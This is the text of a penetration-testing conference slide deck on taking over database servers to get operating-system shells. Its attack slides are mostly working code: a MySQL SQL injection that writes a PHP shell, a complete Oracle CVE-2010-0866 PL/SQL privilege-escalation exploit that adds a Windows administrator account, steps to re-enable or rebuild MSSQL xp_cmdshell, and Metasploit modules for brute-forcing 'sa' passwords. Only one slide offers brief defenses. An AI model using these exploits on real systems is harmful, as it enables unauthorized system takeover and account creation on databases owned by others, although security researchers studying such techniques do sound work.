1. Rock'n Roll in Database
Security
Prathan Phongthiproek (Lucifer@CITEC)
Senior Information Security Consultant
ACIS ProfessionalCenter

2. Who am I ?
 CITEC Evolution
 Code Name “Lucifer”, Moderator, Speaker
 Instructor: Web Application (In) Security 101
 Instructor: Mastering in Exploitation
 ACIS ProfessionalCenter
 RedTeam : Penetration Tester
 Instructor / Speaker
 Security Consultant / Researcher
 Founder of CWH Underground Hacker
 Exploits,Vulnerabilities, Papers Disclosure
 Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc
 http://www.exploit-db.com/author/?a=1275

3. Let’sTalk !?
“Get DBA privilege is good but get SHELL is better !!”
 MySQL PWNED !! From Web Application to get SHELL
 Oracle Escalating Privilege XPL For get SHELL
 MSSQL Credentials Attack For get SHELL

4. MSSQL and OracleVulnerabilities
0
40
80
120
160
2002 2003 2004 2005 2006 2007 2008 2009
24
3
0 0 0 0
11
0
46
12
25
61
144
41
48
36
SQL Server Oracle

5. MySQL Jump into OS
 MySQL5.xVulnerability, 0-Day on Immunity CANVAS
 SQL Injection viaWeb Application (Top Hit !!)
 MySQL Outfile Function
 Need writable directory
 Need Absolute path
 Need Magic_quote off
 Union select 1,‘code’,3,4 into outfile “/www/htdocs/shell.php”
 MySQL Load_file Function (Better !!)
 Need Absolute path
 Need phpMyAdmin path or MySQL 3306 was opened at firewall
 Union select 1,load_file(0x4332…………)

6. MySQL PWNED !! FromWeb Application
to get SHELL

7. Oracle Escalating Privilege XPL For get
SHELL – PL/SQL Injection
 Dbms_cdc_publish3 – For Oracle 10gR1-11gR2
 Dbms_cdc_publish2
 Dbms_cdc_publish
 Dbms_metadata_open
 Dbms_export_extension
 It_findricset_cursor
 It_compressworkspace
 It_mergeworkspace
 It_removeworkspace
 It_rollbackworkspace

8. Oracle Escalating Privilege XPL For get
SHELL
 DBMS_JVM_EXP_PERMS package that allow any user create
privilege to grant themselves java IO Privileges
 CVE-2010-0866
 Affect Oracle 10g-11g (Windows Only)
 Defense
 Apply October 2010 Critical Patch Update
 Oracle 11gR2 onWindows still secure
 Revoke privileges from users to execute
DBMS_JVM_EXP_PERMS

9. Oracle Escalating Privilege XPL For get
SHELL
 XPL Code (Grant JAVA IO Privilege)
 DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS
SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission',’<<ALL
FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT
INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;
 DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS
SELECT 'GRANT',USER(),
'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM
DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE
C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;
 DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS
SELECT 'GRANT',USER(),
'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM
DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE
C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;

10. Oracle Escalating Privilege XPL For get
SHELL
 XPL Code (OS Execute)
 select
DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:windows
system32cmd.exe', '/c', ’net user prathan 1234 /add’) from dual;
 select
DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:windows
system32cmd.exe', '/c', ’net localgroup administrators prathan /add’) from
dual;

11. Oracle Escalating Privilege XPL For get
SHELL

12. MSSQL CredentialsAttack For get SHELL
 ‘SA’ is God Account, Run with SYSTEM Privilege onWindows
 Default ‘sa’ password is blank password or guessable
 Require “xp_cmdshell” stored procedures (Disable by default
on MSSQL 2005+)
 Enabled it with osql
 On MSSQL 2005
 EXEC sp_configure ‘show advanced options’, 1
RECONFIGURE
EXEC sp_configure ‘xp_cmdshell’, 1
RECONFIGURE

13. MSSQL CredentialsAttack For get SHELL
 On MSSQL 2000
 Xp_cmdshell was drop by sp_dropextendedproc
 EXEC sp_addextendedproc ‘xp_anyname’, ‘xp_log70.dll’
 CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result

14. MSSQL CredentialsAttack For get SHELL
 Brute-Force ‘sa’ password and use sa credentials to run os
command on target machine with Metasploit modules
 Scanner/mssql/mssql_ping
 Scanner/mssql/mssql_login
 Admin/mssql/mssql_exec
 Windows/smb/psexec

15. IPWN4 – PenTestTools (Jail-Broken)
 Pen-TestTools (Command-line)
 Metasploit Framework
 Social Engineering Toolkit
 Nmap Scanner, Amap, Hping
 Nbtscan, netcat
 Nikto2, dnsmap
 Ettercap-NG, Aircrack-NG
 GUITools
 iTeleport
 Jaadu RDP
 iNet
 WiFiFoFum

16. Full Compromise MSSQL via Iphone4